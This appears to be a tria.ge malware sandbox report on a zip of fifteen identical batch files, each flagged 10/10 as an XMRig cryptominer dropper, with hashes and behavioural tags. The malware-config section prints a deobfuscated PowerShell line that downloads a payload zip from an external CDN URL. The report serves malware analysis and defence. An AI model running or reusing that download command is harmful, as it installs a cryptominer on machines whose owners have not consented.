Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

tesy - Copy (10).bat

windows10-2004-x64

10

tesy - Copy (11).bat

windows10-2004-x64

10

tesy - Copy (12).bat

windows10-2004-x64

10

tesy - Copy (13).bat

windows10-2004-x64

10

tesy - Copy (14).bat

windows10-2004-x64

10

tesy - Copy (2).bat

windows10-2004-x64

10

tesy - Copy (3).bat

windows10-2004-x64

10

tesy - Copy (4).bat

windows10-2004-x64

10

tesy - Copy (5).bat

windows10-2004-x64

10

tesy - Copy (6).bat

windows10-2004-x64

10

tesy - Copy (7).bat

windows10-2004-x64

10

tesy - Copy (8).bat

windows10-2004-x64

10

tesy - Copy (9).bat

windows10-2004-x64

10

tesy - Copy.bat

windows10-2004-x64

10

tesy.bat

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test15k2.zip

  • Size

    8KB

  • Sample

    231031-vdyr9sbd2t

  • MD5

    e5095fd8a247842d03bcc2195bfcf96f

  • SHA1

    46af5182a094fdebf0f5f4faae9d2d11eec11149

  • SHA256

    3113000f470106b98b5a3208266c79213a33567ca7841dd1cfe8ab84847c4eb8

  • SHA512

    8a4c650dfb9bd12fe6e8eca143c755766c2c6a860052c46e9a1baa519ac70d6dc7be315ba9d88b0d0d9fdf0738f7aeffb67a8334202e10b6090d542588eb7497

  • SSDEEP

    192:FErBx2hJrBx2hOrBx2hTrBx2hArBx2hIrBx2hNrBx2h4LrBx2hbrBx2hsrBx2hRt:FoihZiheih3ih0ihMihtih4fihvihgiN

Score
10/10
xmrigminer

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip", "test1.zip")
2
URLs
exe.dropper

https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip

Targets

    • Target

      tesy - Copy (10).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral1

    • Target

      tesy - Copy (11).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral2

    • Target

      tesy - Copy (12).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral3

    • Target

      tesy - Copy (13).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral4

    • Target

      tesy - Copy (14).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral5

    • Target

      tesy - Copy (2).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral6

    • Target

      tesy - Copy (3).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral7

    • Target

      tesy - Copy (4).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral8

    • Target

      tesy - Copy (5).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral9

    • Target

      tesy - Copy (6).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral10

    • Target

      tesy - Copy (7).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral11

    • Target

      tesy - Copy (8).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral12

    • Target

      tesy - Copy (9).bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral13

    • Target

      tesy - Copy.bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral14

    • Target

      tesy.bat

    • Size

      706B

    • MD5

      035f17438f6146d5ac7285b4adfeb370

    • SHA1

      ef83c877367e96073e2b9b841d9c03ece6b1df7e

    • SHA256

      02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

    • SHA512

      49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

    Score
    10/10
    xmrigminer

    • XMRig Miner payload

      miner

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Blocklisted process makes network request

    • Executes dropped EXE

    behavioral15

MITRE ATT&CK Matrix

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.